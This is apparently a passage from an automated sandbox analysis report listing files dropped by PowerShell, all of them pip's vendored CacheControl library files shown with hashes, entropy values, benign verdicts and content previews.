                              SSDEEP:768:guAEeI3FfH+2cNDDMVyJewpZ68elBVgsfmCfS+/xIQu6kVWNt6jSQ:guAEtFfHQNDD9Jewp0llBVHfmCfSsGb9
                              MD5:42D882A719550AA5B1143D33CB5F5ABC
                              SHA1:B65EB15D6F360382BB4F31332E9DECF409295D9F
                              SHA-256:423558902E338A447C703C73655D885A051582752E47A7B020088EEED4951CF5
                              SHA-512:F6C7942055397A0DBA8E83D17F3D8439748A354F9679289CB1038CF198BFFFEB49651EBD236FCAD5F7C3360823A61443DB2C603FBF0D48F60904C4644EA46261
                              Malicious:false
                              Preview:........=.Cf..........................N.....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.e.j...................d.....d.k(..Z.e.j...................d.....d.k(..Z.e.j...................d.d...d.k\..Z.e.r.e.f.Z.e.f.Z.e.f.Z.e.Z.e.Z.e.j...................Z.n_e.f.Z.e.e.f.Z.e.e.j6..................f.Z.e.Z.e.Z.e.j:..................j=..................d.........r...e.d.........Z.n"..G.d...d.e.........Z ....e!..e ....................e.d.........Z.[ e.r.d.d.l#m$Z$..n.d.Z$d...Z%d...Z&..G.d...d.e.........Z'..G.d...d.e'........Z(..G.d...d.e.jR..........................Z*..G.d...d.e'........Z+..G.d...d.e.........Z,..e,e-........Z...G.d...d.e*........Z/g...e+d.d.d.d.............e+d d!d"d#d ............e+d$d!d!d%d$............e+d&d'd"d(d&............e+d)d'd*............e+d+d!d"d,d+............e+d-d.d.d/d-............e+d0d.d.d-d0............e+d1d2d3............e+d4d'd"d5d4............e+d6d'e.r.d7n.d8d9............e+d:d'd;............e+d<d=d>d?............e+d.d.d.............e+d@d@dA..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):122059
                              Entropy (8bit):5.316132166669628
                              Encrypted:false
                              SSDEEP:1536:h7cilam7YX256nAeW9pKgpGY6SIlSkHsIMNitc8F9g1plMmdB/qyAEi5fPwpwqc/:hgOZc25znKiGY6SPkH7MWPUPAEQqcg3A
                              MD5:92F827C49423BE9DF446CD44E81BF902
                              SHA1:713A0CC2E70DA0A6C4996688E000D1DA0EDED405
                              SHA-256:45B80D9145D098442FA52626123702293E6C2FA4684AB468AEBE7E052F90A4BE
                              SHA-512:43BF2484BA30903678280C59E7816D2588E58B620A8EEC7BE384F4687E28C7795A0B5F3F5355E9E81694BB714E79EA4E289D9A4B1AE872B3B97F365F30FD1664
                              Malicious:false
                              Preview:........=.Cf...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.Z.e.Z...G.d...d.........Z...e.........Z.e.f.d...Z.e.j$..................d.k\..r.d...Z.n.e.j$..................d.k\..r.d...Z.n.d...Z.d.d...Z.e.j*..................Z...e.j,..................d.........Z...e.j,..................d.........Z...e.j,..................d.........Z...e.j,..................d.d...........Z...e.j,..................d.d...........Z.e.j$..................d.k\..r.d.d.l.m.Z...n...G.d...d.e.........Z...G.d...d.e...........Z.e.j<..................Z...G.d...d.e.j>..................d...........Z ..e!e.d.........r.e.j$..................d.d...d k\..r.e.jD..................Z"n...G.d!..d"e d...........Z#..e#d.d#.$........Z"e.j$..................d.k\..r.e.jH..................Z$n.d%..Z$d&..Z%e.j$..................d'k\..r.e.jL..................Z&n3d(..Z'd)..Z(..G.d*..d+e.jR..................d...........Z*..G.d,..d-e d...........Z+..e+d..$........Z&e.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):676
                              Entropy (8bit):4.852635062396944
                              Encrypted:false
                              SSDEEP:12:8l+O+cF6xDIBGxuqbe2UHSKdD61zdZ1rrdN81ayRkvUHCvzbuWoG2fQWu:VOMceuBDRdDqzdn3dS1iMHRrQWu
                              MD5:D05C6BEC60B3EC01D5623F79F6AA6BDD
                              SHA1:48097D9D6D51F957B78102C7F9AE113B55821C0E
                              SHA-256:72D1DA80C8505EEBD00DD9B84E2AD9AF00CE4F91FCA0134026ACDD288EACA2F9
                              SHA-512:16E8E920E74F5594FAB99556B076E1837A7C8501E280F0B3FADF781F042A43A086C805A2139E90644A392B03F7522703353506DCAA1C1B89D177D2909681F5C1
                              Malicious:false
                              Preview:# SPDX-FileCopyrightText: 2015 Eric Larson.#.# SPDX-License-Identifier: Apache-2.0.."""CacheControl import Interface...Make it easy to import from cachecontrol without long namespaces..""".__author__ = "Eric Larson".__email__ = "eric@ionrock.org".__version__ = "0.13.1"..from pip._vendor.cachecontrol.adapter import CacheControlAdapter.from pip._vendor.cachecontrol.controller import CacheController.from pip._vendor.cachecontrol.wrapper import CacheControl..__all__ = [. "__author__",. "__email__",. "__version__",. "CacheControlAdapter",. "CacheController",. "CacheControl",.]..import logging..logging.getLogger(__name__).addHandler(logging.NullHandler()).
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):912
                              Entropy (8bit):5.401821985495942
                              Encrypted:false
                              SSDEEP:24:XClmTEceuP1mH7aOuD1ADZS3/bd9fcE1p:XC+E5HGpmZSDdtcK
                              MD5:A7BADB4F7BF552A78C412DD59359FDC0
                              SHA1:6771FD38F92CFEB38A88ECB414DB49AB311C97B8
                              SHA-256:7A9F2F8AD990E00BE103D7E497C8E05ED7804C1F9D86CEBBD4C6DD108D529877
                              SHA-512:D025A0DA8E2CFEE787A4F8F35ACC97433293603A549282E5D8781D7A1F16EA6F575F35C4FF51D957132CD0667355A8B4932D870238730A6A6DDC214F9ADE3A1A
                              Malicious:false
                              Preview:........=.Cf...............................d.Z.d.Z.d.Z.d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.d.d.l.Z...e.j...................e.........j.....................e.j.....................................y.).zbCacheControl import Interface...Make it easy to import from cachecontrol without long namespaces..z.Eric Larsonz.eric@ionrock.orgz.0.13.1.....)...CacheControlAdapter)...CacheController)...CacheControl)...__author__..__email__..__version__r....r....r....N)...__doc__r....r....r..... pip._vendor.cachecontrol.adapterr.....#pip._vendor.cachecontrol.controllerr..... pip._vendor.cachecontrol.wrapperr......__all__..logging..getLogger..__name__..addHandler..NullHandler........mC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/cachecontrol/__init__.py..<module>r........sW................................@..?..9........................(.....&..&.':.w.':.':.'<..=r....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2656
                              Entropy (8bit):5.016947828560067
                              Encrypted:false
                              SSDEEP:48:tzLWaVhV932QtJspVHbX1TxcXGDe2XyBn/YiZH:tzqU9m9HbXngWEYih
                              MD5:EADA0DF25978F8D59D4499303EAA6BBC
                              SHA1:8FEAE72BAF08B1CB1E86F8A9C701578B44ABA210
                              SHA-256:B41FF6D46494216765DD077BEA20850F8AA36578AA54B8EA25FFA4F74B839FFD
                              SHA-512:12C1ACF30C49E19AA5DB07A1E25CBD4CD0401A2DBECC329F56BB7F713043DF060B92BFEC98E5F42D61A2AA1D7D123EC3E616F1DEFCA00C7322B0EC777295BD74
                              Malicious:false
                              Preview:........=.Cf...............................d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z...d.d.l.m.Z...d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.k(..r...e...........y.y.)......)...annotationsN)...ArgumentParser)...TYPE_CHECKING)...requests)...CacheControlAdapter)...DictCache)...logger)...Namespace)...CacheControllerc..........................t.........j...................t.........j.............................t.........j...........................}.t.........j...................|...........y.).N).r......setLevel..logging..DEBUG..StreamHandler..addHandler)...handlers.... .iC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/cachecontrol/_cmd.py..setup_loggingr........s..........O.O.G.M.M..".....#..#..%.G..........g........c...........................t.........t.................d.d.d...........}.t.........j...........................}.|.j...................d.|...........|.j...................d.|....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):6474
                              Entropy (8bit):5.426638984633935
                              Encrypted:false
                              SSDEEP:96:gN5yxCMGzojvCm5p45T6/no2w9DlRhr5+6PNpJqn:U58CMGkjvCm5pi6g2k5R/+6PNpJq
                              MD5:34CFCF4BFE04E649DB6AD72984D0A6A7
                              SHA1:9B427604B3151B8AE6E47D8A2BAEE387DEDBF6FB
                              SHA-256:E031A2FE2B67CF46EC7B247A0DD400539B422CCF231F9E11BD4F5242FAD1DA02
                              SHA-512:79AAFD20F176F63B9D5943914BF043C59662CF6E89F13D013B7CCC658A1CABD74FF44226CA0F282FF9DECF39CF30284D562B3AA114B6E02EF282BC8B29A04131
                              Malicious:false
                              Preview:........=.Cf................................d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.r d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.........Z.y.)......)...annotationsN)...TYPE_CHECKING..Any..Collection..Mapping)...HTTPAdapter)...DictCache)...PERMANENT_REDIRECT_STATUSES..CacheController)...CallbackFileWrapper)...PreparedRequest..Response)...HTTPResponse)...BaseCache)...BaseHeuristic)...Serializerc.............................e.Z.d.Z.h.d...Z.............d...................................d...f.d...Z.............d...............................d...f.d...Z.....d...................d...f.d...Z.d...f.d...Z...x.Z.S.)...CacheControlAdapter>......PUT..PATCH..DELETEc............................t...........|.....|.i.|.......|...t.................n.|.|._.........|.|._.........|.x.s...d.|._.........|.x.s...t.........}...|.|.j...................|.|...........|._.........y.).N)...GET)...cache_etag
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):3819
                              Entropy (8bit):5.039434720378563
                              Encrypted:false
                              SSDEEP:48:S6peOcc8vPrnfpEs27i/7dxnAtZgkwsRZLKfuZBc6jc6Vonx1YBT:adVvPjfp/7T5sRZLU0c6wwons
                              MD5:C801618D006ABABE98BF74FE051054DB
                              SHA1:588CEE23FF9396105E85F6744DD4C260F52A316D
                              SHA-256:F3F3192EEE38AF14762F680B9A8C473928600D3C95DB8116A0EB86C25C98D685
                              SHA-512:90CE69BDA1A3864EEB4265D49A82F7C22F09B65D406D78C849270BBF1429E1FE58DA38D40BF4E268897903CDF5E90BF49442FC3F53417F8F2E5C3794F1825EBF
                              Malicious:false
                              Preview:........=.Cf...............................d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...e.r.d.d.l.m.Z.....G.d...d.........Z...G.d...d.e.........Z...G.d...d.e.........Z.y.).zb.The cache object API for implementing caches. The default is a thread.safe in-memory dictionary.......)...annotations)...Lock)...IO..TYPE_CHECKING..MutableMapping)...datetimec.....................>.....e.Z.d.Z.d.d...Z...d...............d.d...Z.d.d...Z.d.d...Z.y.)...BaseCachec...........................t.....................N....NotImplementedError....self..keys.... .jC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/cachecontrol/cache.py..getz.BaseCache.get.............!..#..#.....Nc...........................t...................r....r......r....r......value..expiress.... r......setz.BaseCache.set....s.........."..#..#r....c...........................t...................r....r....r....s.... r......deletez.BaseCache.delete....r....r....c...........................y.r.....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):16177
                              Entropy (8bit):5.433285475559155
                              Encrypted:false
                              SSDEEP:384:co/VNuqCUx54XW3uErFehV0llOf6gYKFqvNgxOPpwWrQ:coNQqXxyXWzrFJlOf6gYkqFg42WrQ
                              MD5:A1A9377FE5608120945BF6D7FE860484
                              SHA1:B7639679EBC5E7D3BB3BDC2AD7298C643A4DE890
                              SHA-256:B7103E855D575B72B7351FF48CC2EC68D164415104EC5DA50174EEDAB32F52CC
                              SHA-512:18A5B13B8476398B8035F61A3768E663442DF233C267B0CAF280DB3C9B0D1F92863C2EB7864C63DD68762E5B9BFD3D987E4E9DE51CA69A37542EA2769D042550
                              Malicious:false
                              Preview:........=.Cf.G..............................d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j4..................e.........Z...e.j:..................d.........Z.d.Z.d.d...Z ..G.d...d.........Z!y.).z7.The httplib2 algorithms ported for use with requests.......)...annotationsN)...parsedate_tz)...TYPE_CHECKING..Collection..Mapping)...CaseInsensitiveDict)...DictCache..SeparateBodyBaseCache)...Serializer)...Literal)...PreparedRequest)...HTTPResponse)...BaseCachez9^(([^:/?#]+):)?(//([^/?#]*))?([^?#]*)(\?([^#]*))?(#(.*))?)..-....4...c..........................t.........j...................|.........}.|...J...|.j...........................}.|.d.....|.d.....|.d.....|.d.....|.d.....f.S.).z.Parses a URI using the regex given in Appendix B of RFC 3986... (scheme, authority, path, query, fragment) = parse_uri(uri). .........................)...URI..match..groups)...u
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4357
                              Entropy (8bit):5.21870824925254
                              Encrypted:false
                              SSDEEP:48:ooRZK5w8xH3Ik0BcYL/5x7WTe6wVWqwol/WDBR1ydOWzixv46VF1T7hZ:ooRZiwjv/nWTaBSh4OWmxLV7
                              MD5:9EE38147CE0AD6859683F24D140A72E6
                              SHA1:3E815F92B93D5EE93C497BA847E1E251E47A29D5
                              SHA-256:D745E1164A1D7D6B117F3FFF135A80671F3F47E634851319F98B33FF6F4C1A3E
                              SHA-512:292C5DBA9D558223C518F8796B780CA04CE21D8CBF57FF72DCBD7CEEA414EA6CC61098ED5F3824EDCD0891F3A48DB7E0A0520D116C055E16B7BA83300BA5E0E7
                              Malicious:false
                              Preview:........=.Cf..........................\.....d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...e.r.d.d.l.m.Z.....G.d...d.........Z.y.)......)...annotationsN)...NamedTemporaryFile)...TYPE_CHECKING..Any..Callable)...HTTPResponsec.....................N.....e.Z.d.Z.d.Z.............d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.y.)...CallbackFileWrappera..... Small wrapper around a fp object which will tee everything read into a. buffer, and when that file is closed it will execute a callback with the. contents of that buffer... All attributes are proxied to the underlying file object... This class uses members with a double underscore (__) leading prefix so as. not to accidentally shadow an attribute... The data is stored in a temporary file until it is all available. As long. as the temporary files directory is disk-based (sometimes it's a. memory-backed-``tmpfs`` on Linux), data will be unloaded to disk if memory. pressure is high. For small files the
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):6704
                              Entropy (8bit):5.290888743063452
                              Encrypted:false
                              SSDEEP:96:XOzYen7/caW4PM7qBBHiYjfgYB5zYdyKq6H+Cmzcl5nMadqmaf2k:xYWbuBBrT5+yKngza5nMadqmaf2k
                              MD5:DCE3AFDE99206B060EE79181BF216287
                              SHA1:D61302FA53066DB4D230E2C70DC6C5B1AE93A893
                              SHA-256:511168AEC7CBA8AF8C3B289865D37FD774E10AC23D940916D32CD90719EBB427
                              SHA-512:FEEE7366C6C9516A72748473FF0E808005908AC2DF209FF6613DFD8B9139833AE26AA2934A4BF9148D395DE3F43005D11CA9B3816FC17297057CD288B05E79BF
                              Malicious:false
                              Preview:........=.Cf................................d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...e.r.d.d.l.m.Z...d.Z.d.d.d...Z.d.d...Z...G.d...d.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.y.)......)...annotationsN)...datetime..timedelta..timezone)...formatdate..parsedate..parsedate_tz)...TYPE_CHECKING..Any..Mapping)...HTTPResponsez.%a, %d %b %Y %H:%M:%S GMTc.....................Z.....|.x.s#..t.........j...................t.........j...........................}.|.|.z...S...N).r......nowr......utc)...delta..dates.... .oC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/cachecontrol/heuristics.py..expire_afterr........s#..........-.8.<.<........-.D....%.<........c.....................Z.....t.........t.........j...................|.j...........................................S.r....).r......calendar..timegm..timetuple)...dts.... r......datetime_to_headerr........s..........h.o.o.b.l.l.n..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):6415
                              Entropy (8bit):5.3602433624647885
                              Encrypted:false
                              SSDEEP:192:yBucKKgtKbEm2jWlq1TTCA4ckzzYS+ugPmpKj:y4cKboEmSR1CAHgz9gPKKj
                              MD5:6D02C568388B0F03D617FA4A6799622C
                              SHA1:1F7EEEB18E03CED067C2BBA584103DD24723F9D7
                              SHA-256:073CEDE2381D4EA13C44DBDF4BB411003C830C33B143D8F93918CFCDD7532872
                              SHA-512:9BEDBA9D96B19626FCEAAA033DAB5ACA13652769392372B99BE5534667DC4BEDD519300F61959C79777A345EF8EFDC9551D050E27F5C30C3B3F13AC7F8704FD5
                              Malicious:false
                              Preview:........=.Cf..........................|.....d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z.....G.d...d.........Z.y.)......)...annotationsN)...IO..TYPE_CHECKING..Any..Mapping..cast)...msgpack)...CaseInsensitiveDict)...HTTPResponse)...PreparedRequestc...........................e.Z.d.Z.d.Z...d...............d.d...Z.d.d...Z...d...............d.d...Z...d...............d.d...Z...d...............d.d...Z...d...............d.d...Z...d...............d.d...Z...d...............d.d...Z...d...............d.d...Z.y.)...Serializer..4Nc...........................t.........|.j...........................}.|..<|.j...................d...........}.t.........j...................|.........|._.........t.........|.........|._.........d.|.|.j...................j...........................D.....c.i.c.]...\...}.}.t.........|.........t.........|...............c.}.}.|.j...................|.j...................t.........|.j...........................|.j..............
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1684
                              Entropy (8bit):5.645883640045186
                              Encrypted:false
                              SSDEEP:24:1I8HYnREfySAaMGZw550wAAJemwoNv3BnyJC7ij42nD71DExVsXkkyC24h:98Kh16HAoemw8vRyuZ2nDZExOXZ
                              MD5:D9146E71B1B727F4436504251BB3D508
                              SHA1:3202D04AC9CB1069B7A5EBA4B8DA42495A22537D
                              SHA-256:894DF1AEE6A4D95771877D77562B06EA2FE18A164683FEB39FB9427D34060082
                              SHA-512:AD46BC3FB29D906AE0128C76E8D9DDAA0445C99B087B2F6A720CBA1018CE905EF72F3F82E5008B3B90DAB858276608D43BA9AD71B122299A4E130B064ACB6A15
                              Malicious:false
                              Preview:........=.Cf...............................d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.................d...................................d.d...Z.y.)......)...annotations)...TYPE_CHECKING..Collection)...CacheControlAdapter)...DictCache)...requests)...BaseCache)...CacheController)...BaseHeuristic)...SerializerNc..........................|...t.................n.|.}.|.x.s...t.........}...|.|.|.|.|.|.|...........}.|.j...................d.|...........|.j...................d.|...........|.S.).N)...cache_etags..serializer..heuristic..controller_class..cacheable_methodsz.http://z.https://).r....r......mount)...sess..cacher....r....r....r......adapter_classr......adapters.... .lC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/cachecontrol/wrapper.py..CacheControlr........s[.........!.=.I.K.e.E..!..8.%8.M.................)..+......G......J.J.y.'.."....J.J.z.7..#....K.....).NTNNNNN
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):1737
                              Entropy (8bit):4.772941247029604
                              Encrypted:false
                              SSDEEP:24:VO7C+iO2d3mdDqzdcyrd2BnVahBYSefxg4bBQnYlRNBhQLPx72egQU9NZIWvFVXo:o7tF8Sxg46nYnNB2LBKQUvZT5uIi
                              MD5:E4259D6FF28702FA18B2F2086840F66E
                              SHA1:F9F1C294B57D2432B802625D40549F21A22E3CE9
                              SHA-256:8A2B2DD84A7326F0D5221300C57ABC8859D306C89901DEA2A65C5F98D6E83729
                              SHA-512:698087631629C110E6274F1FE427A9D6E23148A5A88F95C8828156069A06E245369E9A790085CCB4E4AA20E4CED426B4B85D94292FFC0D2823E6720EFD769F62
                              Malicious:false
                              Preview:# SPDX-FileCopyrightText: 2015 Eric Larson.#.# SPDX-License-Identifier: Apache-2.0.from __future__ import annotations..import logging.from argparse import ArgumentParser.from typing import TYPE_CHECKING..from pip._vendor import requests..from pip._vendor.cachecontrol.adapter import CacheControlAdapter.from pip._vendor.cachecontrol.cache import DictCache.from pip._vendor.cachecontrol.controller import logger..if TYPE_CHECKING:. from argparse import Namespace.. from pip._vendor.cachecontrol.controller import CacheController...def setup_logging() -> None:. logger.setLevel(logging.DEBUG). handler = logging.StreamHandler(). logger.addHandler(handler)...def get_session() -> requests.Session:. adapter = CacheControlAdapter(. DictCache(), cache_etags=True, serializer=None, heuristic=None. ). sess = requests.Session(). sess.mount("http://", adapter). sess.mount("https://", adapter).. sess.cache_controller = adapter.controller # type: ignore[attr-defined]
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):6392
                              Entropy (8bit):4.359089930880496
                              Encrypted:false
                              SSDEEP:48:o7uj6PoSXSc7stvzXO1MW+3/IvsZtMJwekDFgCmhtCysItRBUF8BzDHU4wTNpvh+:P6PVgXnwGpgz7N3Rm81azbPW9eMo3i
                              MD5:F5FFB0AFF14AE8757099928241770D36
                              SHA1:43C590C57291C80623E6BE616D4382F2F0440330
                              SHA-256:FC2716BD43FDD38F2A0198EC36A5626876DD70BB3D9A614D8B155FA4EEE879B1
                              SHA-512:0A45A6A200427BB7696BF64D083472E6DE2D5E6806BD45C4D89D4C59493A232B224F4E8A3E81BF10BA9364D2A45C3478F477E8E77468773494907285BD3D3E0C
                              Malicious:false
                              Preview:# SPDX-FileCopyrightText: 2015 Eric Larson.#.# SPDX-License-Identifier: Apache-2.0.from __future__ import annotations..import functools.import types.import zlib.from typing import TYPE_CHECKING, Any, Collection, Mapping..from pip._vendor.requests.adapters import HTTPAdapter..from pip._vendor.cachecontrol.cache import DictCache.from pip._vendor.cachecontrol.controller import PERMANENT_REDIRECT_STATUSES, CacheController.from pip._vendor.cachecontrol.filewrapper import CallbackFileWrapper..if TYPE_CHECKING:. from pip._vendor.requests import PreparedRequest, Response. from pip._vendor.urllib3 import HTTPResponse.. from pip._vendor.cachecontrol.cache import BaseCache. from pip._vendor.cachecontrol.heuristics import BaseHeuristic. from pip._vendor.cachecontrol.serialize import Serializer...class CacheControlAdapter(HTTPAdapter):. invalidating_methods = {"PUT", "PATCH", "DELETE"}.. def __init__(. self,. cache: BaseCache | None = None,. cache_etags: bo
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):1952
                              Entropy (8bit):4.670470726433027
                              Encrypted:false
                              SSDEEP:48:oKcXfDGmt/i2IUPK9T+iKiIRI/1PqqH19KZBc3F:SL+9T1YALH19YcV
                              MD5:8627F1C3C600A8070AD77ED7A2CE9A12
                              SHA1:38A776550E923503DAD5CE04DCCBDC69A1B615C1
                              SHA-256:393423EF6B547FC0B5B8481CCDD97719CF2F925752CEC4C84CAB4318A331E33F
                              SHA-512:8431EDAF1BD01FCA4F3637E1DDDC329BEBB46BEDF5B4B5CC8EFC611B790B4845E6BACB06E23C9A96B2AE629D85E7A8F49A384AB4B4ADF377F1E0C3A0A38FAFBE
                              Malicious:false
                              Preview:# SPDX-FileCopyrightText: 2015 Eric Larson.#.# SPDX-License-Identifier: Apache-2.0..""".The cache object API for implementing caches. The default is a thread.safe in-memory dictionary..""".from __future__ import annotations..from threading import Lock.from typing import IO, TYPE_CHECKING, MutableMapping..if TYPE_CHECKING:. from datetime import datetime...class BaseCache:. def get(self, key: str) -> bytes | None:. raise NotImplementedError().. def set(. self, key: str, value: bytes, expires: int | datetime | None = None. ) -> None:. raise NotImplementedError().. def delete(self, key: str) -> None:. raise NotImplementedError().. def close(self) -> None:. pass...class DictCache(BaseCache):. def __init__(self, init_dict: MutableMapping[str, bytes] | None = None) -> None:. self.lock = Lock(). self.data = init_dict or {}.. def get(self, key: str) -> bytes | None:. return self.data.get(key, None).. def set(.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):303
                              Entropy (8bit):4.913774273787475
                              Encrypted:false
                              SSDEEP:6:SNlYhgLRatcmYddkbQSyF2TzFrddwAFbQf1NKqRJ1JGzZJVF1NL:8l+O+cmYddGQSW2TzFrdd1NQSqRJ1cz7
                              MD5:A854B9652B8647ABB5B30CA3260D2DFF
                              SHA1:1E2ECFDEBCF43FEB2056D6E6AA58D6CD5123C782
                              SHA-256:76DAEBAE82B90670034751968C2675F5A674B45B0C7EF141B4B410535B29FDA8
                              SHA-512:75347562F4B9F8B48C5AD4AC538EAA7F43BDCE549D75717C983FF94ADC610F5A115263966CBA9E9E6929F3F62D6AFB7C06492A1AD455B50CBB755CD35F74348B
                              Malicious:false
                              Preview:# SPDX-FileCopyrightText: 2015 Eric Larson.#.# SPDX-License-Identifier: Apache-2.0..from pip._vendor.cachecontrol.caches.file_cache import FileCache, SeparateBodyFileCache.from pip._vendor.cachecontrol.caches.redis_cache import RedisCache..__all__ = ["FileCache", "SeparateBodyFileCache", "RedisCache"].
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):445
                              Entropy (8bit):5.2011700370395175
                              Encrypted:false
                              SSDEEP:12:Edne/PzX/hJOWzd2Y251XSnrIma84RBjayle2u0ki/:TzHOPYMO3n4O2e4/
                              MD5:7DB7B609E4ABEA072A40269FBEFB530C
                              SHA1:C55AA5EA19FF4D3DE5F3E748623A71C8777A2203
                              SHA-256:045291E4A00F4C428A209CD312E0330A7E93E4119329841BB1007906E9F401D4
                              SHA-512:7F07F3D18C9183607A3EC4827AA51E45991B4C59D70241237F2AEFEEBE7437DB6E0EDB625EE89E86ED805A883A238CA8F06622596EE903A6018C23034A9F1DB4
                              Malicious:false
                              Preview:........=.Cf/.........................(.....d.d.l.m.Z.m.Z...d.d.l.m.Z...g.d...Z.y.)......)...FileCache..SeparateBodyFileCache)...RedisCache).r....r....r....N)..*pip._vendor.cachecontrol.caches.file_cacher....r.....+pip._vendor.cachecontrol.caches.redis_cacher......__all__........tC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/cachecontrol/caches/__init__.py..<module>r........s.............X...B..>..r....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):7720
                              Entropy (8bit):5.163932573267968
                              Encrypted:false
                              SSDEEP:192:7rXE3OrASIOyVAaQHHIGuh0ZVV7mN+Pdl:7w3OkdOyVLwzmYPdl
                              MD5:124AFB4081589EA71B7995FD1CA1D55B
                              SHA1:744D888F360771EF2D1B29D6AF2EC1A153793781
                              SHA-256:A41A039F48717C178676B9B017AFDDFC9A9C7315F6EE1BE98D7D9441ED9D2B0B
                              SHA-512:9DE176F8F8B78773B922B2BAE1E6BD39B20F12F595DA4B9DC664F7137F3B6E087C8AA7C75E818D7A238381357DCAFE90AF567B3BF4EA1F80F236CFFA4EC57CFA
                              Malicious:false
                              Preview:........=.Cf................................d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z...d.d.l.m.Z...d.d...Z...G.d...d.........Z...G.d...d.e.e.........Z...G.d...d.e.e.........Z.d.d...Z.y.)......)...annotationsN)...dedent)...IO..TYPE_CHECKING)...BaseCache..SeparateBodyBaseCache)...CacheController)...datetime)...BaseFileLockc...........................t.........j...................}.|.t.........j...................t.........j...................z...z...}.t.........t.........d.........r.|.t.........j...................z...}.t.........t.........d.........r.|.t.........j...................z...}...t.........j...................|...........t.........j...................|.|.|.........}...t.........j...................|.d.........S.#.t.........$.r...Y..9w.x.Y.w.#...t.........j...................|.............x.Y.w.).N..O_NOFOLLOW..O_BINARY..wb)...os..O_WRONLY..O_CREAT..O_EXCL..hasattrr....r......remove..OSError..open..fdopen..close)...filena
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2748
                              Entropy (8bit):4.945541280284739
                              Encrypted:false
